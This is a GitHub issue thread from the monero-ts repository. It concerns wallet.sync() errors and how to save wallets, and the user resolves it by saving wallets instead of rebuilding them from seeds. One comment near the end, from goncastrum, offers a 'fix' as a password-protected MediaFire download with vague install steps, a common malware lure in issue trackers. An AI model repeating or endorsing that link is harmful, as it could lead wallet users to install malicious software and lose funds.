### ISSUE TITLE
await wallet.sync() throws error on wallets older than a few hours

### ISSUE THREAD

**Issue by znwhite** [woodser/monero-ts#249]
It seems that as soon as a wallet is a few hours old, interacting with it takes forever, because `await wallet.sync()` takes forever, and/or times out with an error like this:

```
 MoneroError: Exception in thread pool
[0]     at LibraryUtils.deserializeError (/Users/user/Documents/dev/project/node_modules/monero-ts/dist/src/main/ts/common/LibraryUtils.js:260:56)
[0]     at LibraryUtils.invokeWorker (/Users/user/Documents/dev/project/node_modules/monero-ts/dist/src/main/ts/common/LibraryUtils.js:249:26)
[0]     at async MoneroWalletFullProxy.invokeWorker (/Users/user/Documents/dev/project/node_modules/monero-ts/dist/src/main/ts/wallet/MoneroWalletKeys.js:470:12)
[0]     at async MoneroWalletFullProxy.sync (/Users/user/Documents/dev/project/node_modules/monero-ts/dist/src/main/ts/wallet/MoneroWalletFull.js:1996:24)
[0]     at async /Users/user/Documents/dev/project/src/routes/admin.js:144:7
```

Is there any way to deal with this besides having to recreate/rotate wallets every few hours?

**Comment by woodser** [comment]
I haven't heard of any issues due to a wallet being a few hours old.

Are you using the latest version , 0.10.3?

Can you also try v0.9.7, since there were major updates to the networking libraries to switch to Axios?

**Comment by znwhite** [comment]
I am consistently getting errors any time I run `await wallet.sync()` on wallets that are older than 4-5 hours, but no issues on wallets that are younger than 2 hours. I am using v0.10.3

If it matters, I am connecting to public/community nodes at the moment (not a private/personal one)

**Comment by woodser** [comment]
Ok, for experimentation, can you confirm the issue occurs on v0.9.7, since before we updated to Axios and other updates?

> When reopening an old wallet, I am connecting to it from its restore height, so it's not like I have to sync the whole network every time I run wallet.sync() ... right? 😅

Correct, as long as the wallet was saved.

**Comment by znwhite** [comment]
I don't think I'm running `await wallet.close()` at the end of transacting so maybe that's the issue?

When I do open a wallet it looks like this btw (not doing the rpc thing):

```
const wallet = await moneroTs.createWalletFull({
    // config 
})
```
Either way yes, I can try on the older version. Will report back and let you know.

**Comment by woodser** [comment]
`await wallet.close()` will close without saving, so you need to call `await wallet.close(true)` or `await wallet.save()` explicitly to save.

**Comment by znwhite** [comment]
It seems that running `await wallet.close(true)` on my web assembly wallets throws this error:

```
[0] /Users/user/Documents/dev/project/node_modules/monero-ts/dist/dist/monero_wallet_keys.js:9
var Module=typeof monero_ts!="undefined"?monero_ts:{};var readyPromiseResolve,readyPromiseReject;Module["ready"]=new Promise(function(resolve,reject){readyPromiseResolve=resolve;readyPromiseReject=reject});var moduleOverrides=Object.assign({},Module);var arguments_=[];var thisProgram="./this.program";var quit_=(status,toThrow)=>{throw toThrow};

etc.
```

Does the wallet need to perform a transaction in order for it to be save-able?

**Comment by woodser** [comment]
That's a weird one. It seems to be using the keys-only wallet (monero_wallet_keys), which doesn't maintain or save any state, only wallet keys.

That shouldn't be the case if creating/opening/saving a full wallet.

Hard to know what's wrong without seeing more of your code, but I'd ensure you're only working with the full wallet.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by znwhite** [comment]
Ok with your help I think I found the issue. I wasn't saving the wallets to my server, I was just reopening them from seeds/scratch every time, which I think caused the issues.
